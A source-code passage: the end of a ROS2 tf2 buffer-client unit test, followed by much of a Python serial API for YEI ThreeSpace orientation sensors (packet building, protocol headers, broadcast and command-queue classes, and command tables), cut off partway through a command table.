self.spin_thread = threading.Thread(target=self.spin)
self.spin_thread.start()
return
def tearDown(self):
self.spinning.set()
self.spin_thread.join()
return
def feedback_callback(self, feedback):
self.feedback = feedback
def spin(self):
try:
while self.context.ok() and not self.spinning.is_set():
self.executor.spin_once(timeout_sec=0.05)
finally:
return
def timed_spin(self, duration):
start_time = time.time()
while (time.time() - start_time) < duration:
rclpy.spin_once(self.node, executor=self.executor, timeout_sec=0.1)
def execute_goal_callback(self, goal_handle):
print('execute_goal_callback')
goal_handle.set_succeeded()
return LookupTransform.Result()
def test_lookup_transform_true(self):
buffer_client = BufferClient(
self.node, 'lookup_transform', check_frequency=10.0, timeout_padding=0.0)
result = buffer_client.lookup_transform(
'foo', 'bar', rclpy.time.Time(), rclpy.duration.Duration(seconds=5.0))
self.assertEqual(build_transform(
'foo', 'bar', rclpy.time.Time().to_msg()), result)
def test_lookup_transform_fail(self):
buffer_client = BufferClient(
self.node, 'lookup_transform', check_frequency=10.0, timeout_padding=0.0)
with self.assertRaises(LookupException) as ex:
result = buffer_client.lookup_transform(
'bar', 'baz', rclpy.time.Time(), rclpy.duration.Duration(seconds=5.0))
self.assertEqual(LookupException, type(ex.exception))
if __name__ == '__main__':
unittest.main()
|
threespace_api.py
|
#!/usr/bin/env python2.7
from __future__ import print_function
""" This module is an API module for ThreeSpace devices.
The ThreeSpace API module is a collection of classes, functions, structures,
and static variables used exclusively for ThreeSpace devices. This module can
be used on a system running Python 2.5 and newer (including Python 3.x).
"""
__version__ = "2.0.2.3"
__authors__ = [
'"Chris George" <cgeorge@yeitechnology.com>',
'"Dan Morrison" <dmorrison@yeitechnology.com>',
]
import threading
import sys
import serial
import struct
import collections
import traceback
import time
import os
# choose an implementation, depending on the OS
if os.name == 'nt': # sys.platform == 'win32':
from win32_threespace_utils import *
else:
from threespace_utils import *
print("WARNING: No additional utils are loaded!!!!!!")
### Globals ###
global_file_path = os.getcwd()
global_error = None
global_counter = 0
global_donglist = {}
global_sensorlist = {}
global_broadcaster = None
TSS_TIMESTAMP_SENSOR = 0
TSS_TIMESTAMP_SYSTEM = 1
TSS_TIMESTAMP_NONE = 2
TSS_JOYSTICK = 0
TSS_MOUSE = 2
TSS_BUTTON_LEFT = 0
TSS_BUTTON_RIGHT = 1
### Private ###
_baudrate = 115200
_allowed_baudrates = [1200, 2400, 4800, 9600, 19200, 28800, 38400, 57600, 115200, 230400, 460800, 921600]
_wireless_retries = 5
### Functions ###
if sys.version_info >= (3, 0):
def makeWriteArray(startbyte, index_byte=None, command_byte=None, data=None):
rtn_array = bytearray((startbyte,))
if index_byte is not None:
rtn_array.append(index_byte)
if command_byte is not None:
rtn_array.append(command_byte)
if data is not None:
rtn_array += data
rtn_array.append((sum(rtn_array) - startbyte) % 256) # checksum
_hexDump(rtn_array)
return rtn_array
else:
def makeWriteArray(startbyte, index_byte=None, command_byte=None, data=None):
rtn_array = chr(startbyte)
if index_byte is not None:
rtn_array += chr(index_byte)
if command_byte is not None:
rtn_array += chr(command_byte)
if data is not None:
rtn_array += data
rtn_array += chr((sum(bytearray(rtn_array)) - startbyte) % 256) # checksum
_hexDump(rtn_array)
return rtn_array
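# Added note (not part of the original file): makeWriteArray serializes a raw
# command packet as the start byte, optional logical-id and command bytes, an
# optional payload, and a trailing checksum computed over every byte after the
# start byte, modulo 256. For example, a wired getSerialNumber (0xed) request
# with no payload would serialize as:
#   packet = makeWriteArray(0xf7, None, 0xed, None)
#   # -> 0xf7, 0xed, 0xed  (the final 0xed is the checksum)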
def _hexDump(serial_string, header='i'):
if "-d_hex" in sys.argv:
ba = bytearray(serial_string)
print('{0}('.format(header), end='')
for i in range(len(ba)):
if i == len(ba)-1:
print('0x{0:02x}'.format(ba[i]), end='')
else:
print('0x{0:02x},'.format(ba[i]), end='')
print(')')
def _print(string):
if "-d" in sys.argv:
print(string)
def _echoCallback(sensor, state):
_print('{0}:{1}'.format(sensor, state))
def _generateProtocolHeader(success_failure=False,
timestamp=False,
command_echo=False,
checksum=False,
logical_id=False,
serial_number=False,
data_length=False):
byte = 0
struct_str = '>'
idx_list = []
if success_failure:
byte += 0x1
struct_str += '?'
idx_list.append(0)
if timestamp:
byte += 0x2
struct_str += 'I'
idx_list.append(1)
if command_echo:
byte += 0x4
struct_str += 'B'
idx_list.append(2)
if checksum:
byte += 0x8
struct_str += 'B'
idx_list.append(3)
if logical_id:
byte += 0x10
struct_str += 'B'
idx_list.append(4)
if serial_number:
byte += 0x20
struct_str += 'I'
idx_list.append(5)
if data_length:
byte += 0x40
struct_str += 'B'
idx_list.append(6)
return (byte, struct.Struct(struct_str), idx_list)
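# Added note (not part of the original file): the return value is
# (header bitfield byte, struct.Struct used to parse the header, list of
# header field indices). For instance, the default protocol_args used by
# _TSBase below (success_failure, timestamp, command_echo, data_length)
# would produce byte 0x1 + 0x2 + 0x4 + 0x40 = 0x47, struct format '>?IBB',
# and idx_list [0, 1, 2, 6].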
def _generateSensorClass(sensor_inst, serial_port, allowed_device_types):
sensor_inst.compatibility = checkSoftwareVersionFromPort(serial_port)
sensor_inst.port_name = serial_port.name
sensor_inst.serial_port_settings = serial_port.getSettingsDict()
sensor_inst.serial_port = serial_port
hardware_version = convertString(sensor_inst.f7WriteRead('getHardwareVersionString'))
dev_type = hardware_version[4:-8].strip()
if dev_type not in allowed_device_types:
raise Exception("This is a %s device, not one of these devices %s!" % (dev_type, allowed_device_types))
sensor_inst.device_type = dev_type
serial_number = sensor_inst.f7WriteRead('getSerialNumber')
sensor_inst.serial_number = serial_number
if dev_type == "DNG":
if serial_number in global_donglist:
rtn_inst = global_donglist[serial_number]
rtn_inst.close()
rtn_inst.compatibility = sensor_inst.compatibility
rtn_inst.port_name = serial_port.name
rtn_inst.serial_port_settings = serial_port.getSettingsDict()
rtn_inst.serial_port = serial_port
return rtn_inst
global_donglist[serial_number] = sensor_inst
else:
if serial_number in global_sensorlist:
rtn_inst = global_sensorlist[serial_number]
rtn_inst.close()
rtn_inst.compatibility = sensor_inst.compatibility
rtn_inst.port_name = serial_port.name
rtn_inst.serial_port_settings = serial_port.getSettingsDict()
rtn_inst.serial_port = serial_port
if "BT" in dev_type:
rtn_inst.serial_port.timeout = 1.5
rtn_inst.serial_port.writeTimeout = 1.5
if "WL" in dev_type:
rtn_inst.switchToWiredMode()
return rtn_inst
if "BT" in dev_type:
sensor_inst.serial_port.timeout = 1.5
sensor_inst.serial_port.writeTimeout = 1.5
elif "WL" in dev_type:
sensor_inst.switchToWiredMode()
global_sensorlist[serial_number] = sensor_inst
return sensor_inst
def parseAxisDirections(axis_byte):
axis_order_num = axis_byte & 7
if axis_order_num == 0:
axis_order = "XYZ"
elif axis_order_num == 1:
axis_order = "XZY"
elif axis_order_num == 2:
axis_order = "YXZ"
elif axis_order_num == 3:
axis_order = "YZX"
elif axis_order_num == 4:
axis_order = "ZXY"
elif axis_order_num == 5:
axis_order = "ZYX"
else:
raise ValueError
neg_x = neg_y = neg_z = False
if (axis_byte & 32) > 0:
neg_x = True
if (axis_byte & 16) > 0:
neg_y = True
if (axis_byte & 8) > 0:
neg_z = True
return axis_order, neg_x, neg_y, neg_z
def generateAxisDirections(axis_order, neg_x=False, neg_y=False, neg_z=False):
axis_order = axis_order.upper()
if axis_order == "XYZ":
axis_byte = 0
elif axis_order == "XZY":
axis_byte = 1
elif axis_order == "YXZ":
axis_byte = 2
elif axis_order == "YZX":
axis_byte = 3
elif axis_order == "ZXY":
axis_byte = 4
elif axis_order == "ZYX":
axis_byte = 5
else:
raise ValueError
if neg_x:
axis_byte = axis_byte | 32
if neg_y:
axis_byte = axis_byte | 16
if neg_z:
axis_byte = axis_byte | 8
return axis_byte
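# Worked example (added comment; values follow directly from the two functions
# above): generateAxisDirections("XZY", neg_y=True) returns 1 | 16 = 17, and
# parseAxisDirections(17) returns ("XZY", False, True, False).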
def getSystemWirelessRetries():
return _wireless_retries
def setSystemWirelessRetries(retries):
global _wireless_retries
_wireless_retries = retries
def getDefaultCreateDeviceBaudRate():
return _baudrate
def setDefaultCreateDeviceBaudRate(new_baudrate):
global _baudrate
if new_baudrate in _allowed_baudrates:
_baudrate = new_baudrate
def padProtocolHeader69(header_data, sys_timestamp):
fail_byte, cmd_echo, data_size = header_data
return (fail_byte, sys_timestamp, cmd_echo, None, None, None, data_size)
def padProtocolHeader71(header_data):
fail_byte, timestamp, cmd_echo, data_size = header_data
return (fail_byte, timestamp, cmd_echo, None, None, None, data_size)
def padProtocolHeader85(header_data, sys_timestamp):
fail_byte, cmd_echo, rtn_log_id, data_size = header_data
return (fail_byte, sys_timestamp, cmd_echo, None, rtn_log_id, None, data_size)
def padProtocolHeader87(header_data):
fail_byte, timestamp, cmd_echo, rtn_log_id, data_size = header_data
return (fail_byte, timestamp, cmd_echo, None, rtn_log_id, None, data_size)
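# Added note (not part of the original file): each padProtocolHeader* helper
# normalizes a parsed wired-protocol header into the same 7-tuple used by the
# read loop: (fail_byte, timestamp, cmd_echo, checksum, logical_id,
# serial_number, data_size), with None for fields the header did not contain.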
### Classes ###
class Broadcaster(object):
def __init__(self):
self.retries = 10
def setRetries(self, retries=10):
self.retries = retries
def sequentialWriteRead(self, command, input_list=None, filter=None):
if filter is None:
filter = list(global_sensorlist.values())
val_list = {}
for i in range(self.retries):
for sensor in reversed(filter):
packet = sensor.writeRead(command, input_list)
if packet[0]: # fail_byte
continue
val_list[sensor.serial_number] = packet
filter.remove(sensor)
if not filter:
break
# _print("##Attempt: {0} complete".format(i))
else:
# _print("sensor failed to succeed")
for sensor in filter:
val_list[sensor.serial_number] = (True, None, None)
return val_list
def writeRead(self, command, input_list=None, filter=None):
q = TSCommandQueue()
if filter is None:
filter = list(global_sensorlist.values())
for sensor in filter:
q.queueWriteRead(sensor, sensor.serial_number, self.retries, command, input_list)
return q.proccessQueue()
def _broadcastMethod(self, filter, method, default=None, *args):
# _print(filter)
if filter is None:
filter = list(global_sensorlist.values())
val_list = {}
for i in range(self.retries):
for sensor in reversed(filter):
packet = getattr(sensor, method)(*args)
if packet is default: # fail_byte
continue
val_list[sensor.serial_number] = packet
filter.remove(sensor)
if not filter:
break
# _print("##Attempt: {0} complete".format(i))
else:
# _print("sensor failed to succeed")
for sensor in filter:
val_list[sensor.serial_number] = default
return val_list
def broadcastMethod(self, method, default=None, args=[], filter=None, callback_func=None):
q = TSCommandQueue()
if filter is None:
filter = list(global_sensorlist.values())
for sensor in filter:
q.queueMethod( getattr(sensor, method),
sensor,
self.retries,
default,
args,
callback_func)
return q.proccessQueue()
def setStreamingSlots(self, slot0='null',
slot1='null',
slot2='null',
slot3='null',
slot4='null',
slot5='null',
slot6='null',
slot7='null',
filter=None,
callback_func=None):
args = (slot0, slot1, slot2, slot3, slot4, slot5, slot6, slot7)
return self.broadcastMethod('setStreamingSlots', False, args, filter, callback_func)
def getStreamingSlots(self, filter=None, callback_func=None):
return self.broadcastMethod('getStreamingSlots', None, [], filter, callback_func)
def startStreaming(self, record_data=False, filter=None, callback_func=None):
return self.broadcastMethod('startStreaming', False, [record_data], filter, callback_func)
def stopStreaming(self, filter=None, callback_func=None):
return self.broadcastMethod('stopStreaming', False, [], filter, callback_func)
def setStreamingTiming(self, interval, duration, delay, delay_offset, filter=None, callback_func=None):
if filter is None:
filter = list(global_sensorlist.values())
else:
filter = list(filter)
val_list = {}
for sensor in reversed(filter):
success = False
for i in range(self.retries):
if sensor.setStreamingTiming(interval, duration, delay):
if callback_func is not None:
callback_func(sensor, True)
success = True
break
# _print("##Attempt: {0} complete".format(i))
if callback_func is not None:
callback_func(sensor, False)
else:
# _print("sensor failed to succeed")
pass
val_list[sensor] = success
filter.remove(sensor)
delay += delay_offset
return val_list
def startRecordingData(self, filter=None, callback_func=None):
if filter is None:
filter = list(global_sensorlist.values())
for sensor in filter:
sensor.record_data = True
if callback_func is not None:
callback_func(sensor, True)
def stopRecordingData(self, filter=None, callback_func=None):
if filter is None:
filter = list(global_sensorlist.values())
for sensor in filter:
sensor.record_data = False
if callback_func is not None:
callback_func(sensor, True)
def debugPrint(self, broadcast_dict):
for sensor, data in broadcast_dict.items():
_print('Sensor {0:08X}: {1}'.format(sensor, data))
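# Usage sketch (an added illustration, not part of the original file): a
# Broadcaster issues one command to every sensor in global_sensorlist.
# Assuming the sensors have already been constructed elsewhere:
#   broadcaster = Broadcaster()
#   packets = broadcaster.writeRead('getTaredOrientationAsQuaternion')
#   # packets maps each serial number to a (fail_byte, timestamp, data) tuple
#   broadcaster.debugPrint(packets)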
class TSCommandQueue(object):
def __init__(self):
self.queue = []
self.return_dict = {}
def queueWriteRead(self, sensor, rtn_key, retries, command, input_list=None):
self.queue.append(("queueWriteRead", sensor, (self.return_dict, rtn_key, retries, command, input_list)))
def queueMethod(self, method_obj, rtn_key, retries, default=None, input_list=None, callback_func=None):
self.queue.append(("queueMethod", (method_obj, rtn_key, retries, default, input_list, callback_func)))
def _queueMethod(self, method_obj, rtn_key, retries, default=None, input_list=None, callback_func=None):
try:
for i in range(retries):
packet = method_obj(*input_list)
if packet is default: # fail_byte
if callback_func is not None:
callback_func(rtn_key, False)
continue
if callback_func is not None:
callback_func(rtn_key, True)
self.return_dict[rtn_key] = packet
break
else:
self.return_dict[rtn_key] = default
except(KeyboardInterrupt):
print('\n! Received keyboard interrupt, quitting threads.\n')
raise KeyboardInterrupt # fix bug where a thread eats the interrupt
def createThreads(self):
thread_queue = []
for item in self.queue:
if item[0] == "queueWriteRead":
thread_queue.append(item[1].queueWriteRead(*item[2]))
elif item[0] == "queueMethod":
qThread = threading.Thread(target=self._queueMethod, args=item[1])
thread_queue.append(qThread)
return thread_queue
def proccessQueue(self, clear_queue=False):
thread_queue = self.createThreads()
[qThread.start() for qThread in thread_queue]
[qThread.join() for qThread in thread_queue]
if clear_queue:
self.queue = []
return self.return_dict
# Base class should not be used directly
class _TSBase(object):
command_dict = {
'checkLongCommands': (0x19, 1, '>B', 0, None, 1),
'startStreaming': (0x55, 0, None, 0, None, 1),
'stopStreaming': (0x56, 0, None, 0, None, 1),
'updateCurrentTimestamp': (0x5f, 0, None, 4, '>I', 1),
'setLEDMode': (0xc4, 0, None, 1, '>B', 1),
'getLEDMode': (0xc8, 1, '>B', 0, None, 1),
'_setWiredResponseHeaderBitfield': (0xdd, 0, None, 4, '>I', 1),
'_getWiredResponseHeaderBitfield': (0xde, 4, '>I', 0, None, 1),
'getFirmwareVersionString': (0xdf, 12, '>12s', 0, None, 1),
'commitSettings': (0xe1, 0, None, 0, None, 1),
'softwareReset': (0xe2, 0, None, 0, None, 1),
'getHardwareVersionString': (0xe6, 32, '>32s', 0, None, 1),
'getSerialNumber': (0xed, 4, '>I', 0, None, 1),
'setLEDColor': (0xee, 0, None, 12, '>fff', 1),
'getLEDColor': (0xef, 12, '>fff', 0, None, 1),
'setJoystickAndMousePresentRemoved': (0xfd, 0, None, 2, '>BB', 1),
'getJoystickAndMousePresentRemoved': (0xfe, 2, '>BB', 0, None, 1),
'null': (0xff, 0, None, 0, None, 1)
}
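# Added note (not part of the original file): each command_dict entry maps a
# command name to (command byte, response length in bytes, response struct
# format, payload length in bytes, payload struct format, minimum firmware
# compatibility level), as consumed by f7WriteRead/f9WriteRead below.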
def __init__(self, com_port=None, baudrate=_baudrate, timestamp_mode=TSS_TIMESTAMP_SENSOR):
self.protocol_args = { 'success_failure': True,
'timestamp': True,
'command_echo': True,
'data_length': True}
if timestamp_mode != TSS_TIMESTAMP_SENSOR:
self.protocol_args['timestamp'] = False
self.timestamp_mode = timestamp_mode
self.baudrate = baudrate
reinit = False
try: # if this attribute already exists, this instance has been initialized before
check = self.stream_parse
reinit = True
# _print("sensor reinit!!!")
except:
self._setupBaseVariables()
self._setupProtocolHeader(**self.protocol_args)
self._setupThreadedReadLoop()
if reinit:
if self.stream_timing is not None:
self.setStreamingTiming(*self.stream_timing)
if self.stream_slot_cmds is not None:
self.setStreamingSlots(*self.stream_slot_cmds)
def _setupBaseVariables(self):
self.serial_number_hex = '{0:08X}'.format(self.serial_number)
self.stream_timing = None
self.stream_parse = None
self.stream_slot_cmds = ['null'] * 8
self.stream_last_data = None
self.stream_data = []
self.record_data = False
self.data_loop = False
def _setupProtocolHeader(self, success_failure=False,
timestamp=False,
command_echo=False,
checksum=False,
logical_id=False,
serial_number=False,
data_length=False):
protocol_header = _generateProtocolHeader( success_failure,
timestamp,
command_echo,
checksum,
logical_id,
serial_number,
data_length)
protocol_byte, self.header_parse, self.header_idx_lst = protocol_header
d_header = self.f7WriteRead('_getWiredResponseHeaderBitfield')
if d_header != protocol_byte:
self.f7WriteRead('_setWiredResponseHeaderBitfield', protocol_byte)
d_header = self.f7WriteRead('_getWiredResponseHeaderBitfield')
if d_header != protocol_byte:
print("!!!!!fail d_header={0}, protocol_header_byte={1}".format(d_header, protocol_byte))
raise Exception
def _setupThreadedReadLoop(self):
self.read_lock = threading.Condition(threading.Lock())
self.read_queue = collections.deque()
self.read_dict = {}
self.data_loop = True
self.read_thread = threading.Thread(target=self._dataReadLoop)
self.read_thread.daemon = True
self.read_thread.start()
def __repr__(self):
return "<YEI3Space {0}:{1}>".format(self.device_type, self.serial_number_hex)
def __str__(self):
return self.__repr__()
def close(self):
self.data_loop = False
if self.serial_port:
self.serial_port.close()
self.serial_port = None
self.read_thread.join()
def reconnect(self):
self.close()
if not tryPort(self.port_name):
_print("tryport fail")
try:
serial_port = serial.Serial(self.port_name, baudrate=self.baudrate, timeout=0.5, writeTimeout=0.5)
serial_port.applySettingsDict(self.serial_port_settings)
self.serial_port = serial_port
except:
traceback.print_exc()
return False
self._setupProtocolHeader(**self.protocol_args)
self._setupThreadedReadLoop()
if self.stream_timing is not None:
self.setStreamingTiming(*self.stream_timing)
if self.stream_slot_cmds is not None:
self.setStreamingSlots(*self.stream_slot_cmds)
return True
# Wired Old Protocol WriteRead
def f7WriteRead(self, command, input_list=None):
command_args = self.command_dict[command]
cmd_byte, out_len, out_struct, in_len, in_struct, compatibility = command_args
packed_data = None
if in_struct:
if type(input_list) in (list, tuple):
packed_data = struct.pack(in_struct, *input_list)
else:
packed_data = struct.pack(in_struct, input_list)
write_array = makeWriteArray(0xf7, None, cmd_byte, packed_data)
self.serial_port.write(write_array)
if out_struct:
output_data = self.serial_port.read(out_len)
rtn_list = struct.unpack(out_struct, output_data)
if len(rtn_list) != 1:
return rtn_list
return rtn_list[0]
# requires the data read loop to be running; do not call before the read thread is started
# Wired New Protocol WriteRead
def f9WriteRead(self, command, input_list=None):
global global_counter
command_args = self.command_dict[command]
cmd_byte, out_len, out_struct, in_len, in_struct, compatibility = command_args
if self.compatibility < compatibility:
raise Exception("Firmware for device on ( %s ) is out of date for this function. Recommend updating to latest firmware." % self.serial_port.name)
packed_data = None
if in_struct:
if type(input_list) in (list, tuple):
packed_data = struct.pack(in_struct, *input_list)
else:
packed_data = struct.pack(in_struct, input_list)
write_array = makeWriteArray(0xf9, None, cmd_byte, packed_data)
self.read_lock.acquire()
uid = global_counter
global_counter += 1
try:
self.serial_port.write(write_array) # release in reader thread
except serial.SerialTimeoutException:
self.read_lock.release()
self.serial_port.close()
# _print("SerialTimeoutException!!!!")
# !!!!!Reconnect
return (True, None, None)
except ValueError:
try:
# _print("trying to open it back up!!!!")
self.serial_port.open()
# _print("aaand open!!!!")
except serial.SerialException:
self.read_lock.release()
# _print("SerialTimeoutException!!!!")
# !!!!!Reconnect
return (True, None, None)
queue_packet = (uid, cmd_byte)
timeout_time = 0.5 + (len(self.read_queue) * 0.150) # timeout increases as queue gets larger
self.read_queue.append(queue_packet)
start_time = time.clock() + timeout_time
read_data = None
while(timeout_time > 0):
self.read_lock.wait(timeout_time)
read_data = self.read_dict.get(uid, None)
if read_data is not None:
break
timeout_time = start_time - time.clock()
# _print("Still waiting {0} {1} {2}".format(uid, command, timeout_time))
else:
# _print("Operation timed out!!!!")
try:
self.read_queue.remove(queue_packet)
except:
traceback.print_exc()
self.read_lock.release()
return (True, None, None)
self.read_lock.release()
del self.read_dict[uid]
header_list, output_data = read_data
fail_byte, timestamp, cmd_echo, ck_sum, rtn_log_id, sn, data_size = header_list
if cmd_echo != cmd_byte:
# _print("!!!!!!!!cmd_echo!=cmd_byte!!!!!")
# _print('cmd_echo= 0x{0:02x} cmd_byte= 0x{1:02x}'.format(cmd_echo, cmd_byte))
return (True, timestamp, None)
rtn_list = None
if not fail_byte:
if out_struct:
rtn_list = struct.unpack(out_struct, output_data)
if len(rtn_list) == 1:
rtn_list = rtn_list[0]
else:
# _print("fail_byte!!!!triggered")
pass
return (fail_byte, timestamp, rtn_list)
writeRead = f9WriteRead
def isConnected(self, try_reconnect=False):
try:
serial = self.getSerialNumber()
if serial is not None:
return True
except:
pass
return False
## generated functions USB and WL_ and DNG and EM_ and DL_ and BT_
## 85(0x55)
def stopStreaming(self):
fail_byte, t_stamp, data = self.writeRead('stopStreaming')
return not fail_byte
## 86(0x56)
def startStreaming(self):
fail_byte, t_stamp, data = self.writeRead('startStreaming')
return not fail_byte
## 95(0x5f)
def updateCurrentTimestamp(self, time, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('updateCurrentTimestamp', time)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 196(0xc4)
def setLEDMode(self, mode, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setLEDMode', mode)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 200(0xc8)
def getLEDMode(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getLEDMode')
if timestamp:
return (data, t_stamp)
return data
## 223(0xdf)
def getFirmwareVersionString(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getFirmwareVersionString')
data = convertString(data)
if timestamp:
return (data, t_stamp)
return data
## 225(0xe1)
def commitSettings(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('commitSettings')
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 230(0xe6)
def getHardwareVersionString(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getHardwareVersionString')
data = convertString(data)
if timestamp:
return (data, t_stamp)
return data
## 237(0xed)
def getSerialNumber(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getSerialNumber')
if timestamp:
return (data, t_stamp)
return data
## 238(0xee)
def setLEDColor(self, rgb, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('setLEDColor', rgb)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 239(0xef)
def getLEDColor(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getLEDColor')
if timestamp:
return (data, t_stamp)
return data
## 253(0xfd)
def setJoystickAndMousePresentRemoved(self, joystick, mouse, timestamp=False):
arg_list = (joystick, mouse)
fail_byte, t_stamp, data = self.writeRead('setJoystickAndMousePresentRemoved', arg_list)
if timestamp:
return (not fail_byte, t_stamp)
return not fail_byte
## 254(0xfe)
def getJoystickAndMousePresentRemoved(self, timestamp=False):
fail_byte, t_stamp, data = self.writeRead('getJoystickAndMousePresentRemoved')
if timestamp:
return (data, t_stamp)
return data
## END generated functions USB and WL_ and DNG and EM_ and DL_ and BT_
class _TSSensor(_TSBase):
command_dict = _TSBase.command_dict.copy()
command_dict.update({
'getTaredOrientationAsQuaternion': (0x0, 16, '>4f', 0, None, 1),
'getTaredOrientationAsEulerAngles': (0x1, 12, '>fff', 0, None, 1),
'getTaredOrientationAsRotationMatrix': (0x2, 36, '>9f', 0, None, 1),
'getTaredOrientationAsAxisAngle': (0x3, 16, '>4f', 0, None, 1),
'getTaredOrientationAsTwoVector': (0x4, 24, '>6f', 0, None, 1),
'getDifferenceQuaternion': (0x5, 16, '>4f', 0, None, 1),
'getUntaredOrientationAsQuaternion': (0x6, 16, '>4f', 0, None, 1),
'getUntaredOrientationAsEulerAngles': (0x7, 12, '>fff', 0, None, 1),
'getUntaredOrientationAsRotationMatrix': (0x8, 36, '>9f', 0, None, 1),
'getUntaredOrientationAsAxisAngle': (0x9, 16, '>4f', 0, None, 1),
'getUntaredOrientationAsTwoVector': (0xa, 24, '>6f', 0, None, 1),
'getTaredTwoVectorInSensorFrame': (0xb, 24, '>6f', 0, None, 1),
'getUntaredTwoVectorInSensorFrame': (0xc, 24, '>6f', 0, None, 1),
'setEulerAngleDecompositionOrder': (0x10, 0, None, 1, '>B', 1),
'setMagnetoresistiveThreshold': (0x11, 0, None, 16, '>fIff', 3),
'setAccelerometerResistanceThreshold': (0x12, 0, None, 8, '>fI', 3),
'offsetWithCurrentOrientation': (0x13, 0, None, 0, None, 3),
'resetBaseOffset': (0x14, 0, None, 0, None, 3),
'offsetWithQuaternion': (0x15, 0, None, 16, '>4f', 3),
'setBaseOffsetWithCurrentOrientation': (0x16, 0, None, 0, None, 3),
'getAllNormalizedComponentSensorData': (0x20, 36, '>9f', 0, None, 1),
'getNormalizedGyroRate': (0x21, 12, '>fff', 0, None, 1),
'getNormalizedAccelerometerVector': (0x22, 12, '>fff', 0, None, 1),
'getNormalizedCompassVector': (0x23, 12, '>fff', 0, None, 1),
'getAllCorrectedComponentSensorData': (0x25, 36, '>9f', 0, None, 1),
'getCorrectedGyroRate': (0x26, 12, '>fff', 0, None, 1),
'getCorrectedAccelerometerVector': (0x27, 12, '>fff', 0, None, 1),
'getCorrectedCompassVector': (0x28, 12, '>fff', 0, None, 1),
'getCorrectedLinearAccelerationInGlobalSpace': (0x29, 12, '>fff', 0, None, 1),
'getTemperatureC': (0x2b, 4, '>f', 0, None, 1),
'getTemperatureF': (0x2c, 4, '>f', 0, None, 1),
'getConfidenceFactor': (0x2d, 4, '>f', 0, None, 1),
'getAllRawComponentSensorData': (0x40, 36, '>9f', 0, None, 1),
'getRawGyroscopeRate': (0x41, 12, '>fff', 0, None, 1),
'getRawAccelerometerData': (0x42, 12, '>fff', 0, None, 1),
'getRawCompassData': (0x43, 12, '>fff', 0, None, 1),
'_setStreamingSlots': (0x50, 0, None, 8, '>8B', 1),
'_getStreamingSlots': (0x51, 8, '>8B', 0, None, 1),
'_setStreamingTiming': (0x52, 0, None, 12, '>III', 1),
'_getStreamingTiming': (0x53, 12, '>III', 0, None, 1),
'_getStreamingBatch': (0x54, 0, None, 0, None, 1),
'tareWithCurrentOrientation': (0x60, 0, None, 0, None, 1),
'tareWithQuaternion': (0x61, 0, None, 16, '>4f', 1),
'tareWithRotationMatrix': (0x62, 0, None, 36, '>9f', 1),
'setStaticAccelerometerTrustValue': (0x63, 0, None, 4, '>f', 2),
'setConfidenceAccelerometerTrustValues': (0x64, 0, None, 8, '>ff', 2),
'setStaticCompassTrustValue': (0x65, 0, None, 4, '>f', 2),
'setConfidenceCompassTrustValues': (0x66, 0, None, 8, '>ff', 2),
'setDesiredUpdateRate': (0x67, 0, None, 4, '>I', 1),
'setReferenceVectorMode': (0x69, 0, None, 1, '>B', 1),
'setOversampleRate': (0x6a, 0, None, 1, '>B', 1),
'setGyroscopeEnabled': (0x6b, 0, None, 1, '>B', 1),
'setAccelerometerEnabled': (0x6c, 0, None, 1, '>B', 1),
'setCompassEnabled': (0x6d, 0, None, 1, '>B', 1),
'setAxisDirections': (0x74, 0, None, 1, '>B', 1),
'setRunningAveragePercent': (0x75, 0, None, 4, '>f', 1),
'setCompassReferenceVector': (0x76, 0, None, 12, '>fff', 1),
'setAccelerometerReferenceVector': (0x77, 0, None, 12, '>fff', 1),
'resetKalmanFilter': (0x78, 0, None, 0, None, 1),
'setAccelerometerRange': (0x79, 0, None, 1, '>B', 1),
'setFilterMode': (0x7b, 0, None, 1, '>B', 1),
'setRunningAverageMode': (0x7c, 0, None, 1, '>B', 1),
'setGyroscopeRange': (0x7d, 0, None, 1, '>B', 1),
'setCompassRange': (0x7e, 0, None, 1, '>B', 1),
'getTareAsQuaternion': (0x80, 16, '>4f', 0, None, 1),
'getTareAsRotationMatrix': (0x81, 36, '>9f', 0, None, 1),
'getAccelerometerTrustValues': (0x82, 8, '>ff', 0, None, 2),
'getCompassTrustValues': (0x83, 8, '>ff', 0, None, 2),
'getCurrentUpdateRate': (0x84, 4, '>I', 0, None, 1),
'getCompassReferenceVector': (0x85, 12, '>fff', 0, None, 1),
'getAccelerometerReferenceVector': (0x86, 12, '>fff', 0, None, 1),
'getGyroscopeEnabledState': (0x8c, 1, '>B', 0, None, 1),
'getAccelerometerEnabledState': (0x8d, 1, '>B', 0, None, 1),
'getCompassEnabledState': (0x8e, 1, '>B', 0, None, 1),
'getAxisDirections': (0x8f, 1, '>B', 0, None, 1),
'getOversampleRate': (0x90, 1, '>B', 0, None, 1),
'getRunningAveragePercent': (0x91, 4, '>f', 0, None, 1),
'getDesiredUpdateRate': (0x92, 4, '>I', 0, None, 1),
'getAccelerometerRange': (0x94, 1, '>B', 0, None, 1),
'getFilterMode': (0x98, 1, '>B', 0, None, 1),
'getRunningAverageMode': (0x99, 1, '>B', 0, None, 1),
'getGyroscopeRange': (0x9a, 1, '>B', 0, None, 1),
'getCompassRange': (0x9b, 1, '>B', 0, None, 1),
'getEulerAngleDecompositionOrder': (0x9c, 1, '>B', 0, None, 1),
'getMagnetoresistiveThreshold': (0x9d, 16, '>fIff', 0, None, 3),
'getAccelerometerResistanceThreshold': (0x9e, 8, '>fI', 0, None, 3),
'getOffsetOrientationAsQuaternion': (0x9f, 16, '>4f', 0, None, 3),
'setCompassCalibrationCoefficients': (0xa0, 0, None, 48, '>12f', 1),
'setAccelerometerCalibrationCoefficients': (0xa1, 0, None, 48, '>12f', 1),
'getCompassCalibrationCoefficients': (0xa2, 48, '>12f', 0, None, 1),
'getAccelerometerCalibrationCoefficients': (0xa3, 48, '>12f', 0, None, 1),
'getGyroscopeCalibrationCoefficients': (0xa4, 48, '>12f', 0, None, 1),
